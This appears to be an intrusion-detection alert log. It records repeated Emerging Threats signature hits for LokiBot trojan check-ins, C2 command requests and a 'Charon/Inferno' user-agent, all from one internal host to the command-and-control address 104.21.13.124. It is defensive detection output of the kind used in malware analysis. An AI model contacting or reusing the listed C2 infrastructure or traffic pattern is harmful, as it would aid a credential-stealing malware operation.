ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:48.379699
SID:	2024318
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:42.314099
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:52.638175
SID:	2024313
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:40.106892
SID:	2024313
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:42.416972
SID:	2825766
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:30.670976
SID:	2024318
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:32.267354
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:31.437871
SID:	2825766
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.152524
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:41.484457
SID:	2025381
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.179954
SID:	2025381
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:16.574818
SID:	2021641
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:24.221116
SID:	2825766
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.122430
SID:	2825766
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:53.598973
SID:	2825766
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:57.435447
SID:	2024318
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:54.423488
SID:	2025381
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:52.772037
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.062804
SID:	2021641
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:26.534492
SID:	2024313
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.904801
SID:	2025381
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:52.772037
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:30.670976
SID:	2024313
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:57.435447
SID:	2024313
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:26.534492
SID:	2024318
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.972593
SID:	2024318
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.855566
SID:	2024318
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.224947
SID:	2825766
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.972593
SID:	2024313
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.218805
SID:	2825766
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.210551
SID:	2024313
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.947017
SID:	2025381
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.904801
SID:	2021641
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:37.702889
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.278543
SID:	2825766
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.210551
SID:	2024318
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.179954
SID:	2825766
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.855566
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:02.546391
SID:	2024318
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.062804
SID:	2825766
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:00.331066
SID:	2021641
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:02.546391
SID:	2024313
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.218805
SID:	2025381
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:40.804238
SID:	2024318
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:29.787077
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:19.372255
SID:	2021641
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.856471
SID:	2024318
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.036535
SID:	2024313
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.030663
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.856471
SID:	2024313
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:14.340654
SID:	2024318
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.036535
SID:	2024318
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:14.340654
SID:	2024313
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:42.416972
SID:	2021641
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:40.804238
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.890742
SID:	2025381
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:30.613047
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:10.724952
SID:	2025381
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:50.437190
SID:	2024313
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.122189
SID:	2825766
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.732709
SID:	2024318
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.957176
SID:	2021641
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:47.687505
SID:	2825766
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:38.419517
SID:	2025381
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.256073
SID:	2024318
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.256073
SID:	2024313
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:53.598973
SID:	2025381
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:50.546988
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.732709
SID:	2024313
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:50.437190
SID:	2024318
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:42.314099
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:50.546988
SID:	2024318
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:30.670976
SID:	2825766
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:18.685116
SID:	2825766
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:11.400710
SID:	2024313
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:36.358340
SID:	2825766
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.278543
SID:	2025381
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:38.407237
SID:	2024318
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:11.400710
SID:	2024318
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:39.111241
SID:	2024313
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.764699
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:59.640455
SID:	2025381
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.748494
SID:	2021641
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.269664
SID:	2021641
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:38.419517
SID:	2021641
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:03.254673
SID:	2025381
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:16.574818
SID:	2024318
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:16.574818
SID:	2024313
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:31.437871
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:39.111241
SID:	2024318
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:52.772037
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:38.407237
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:40.106892
SID:	2825766
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.198908
SID:	2024318
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.719182
SID:	2021641
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.108965
SID:	2825766
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.987306
SID:	2024313
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:35.452745
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.282252
SID:	2024313
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.892413
SID:	2825766
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:28.593679
SID:	2025381
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:47.778229
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.198908
SID:	2024313
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.219175
SID:	2024318
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.282252
SID:	2024318
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.219175
SID:	2024313
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.022620
SID:	2025381
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:47.778229
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.987306
SID:	2024318
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:31.366751
SID:	2025381
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.042243
SID:	2024313
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.914570
SID:	2021641
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:57.435447
SID:	2025381
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:32.267354
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.265047
SID:	2024318
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

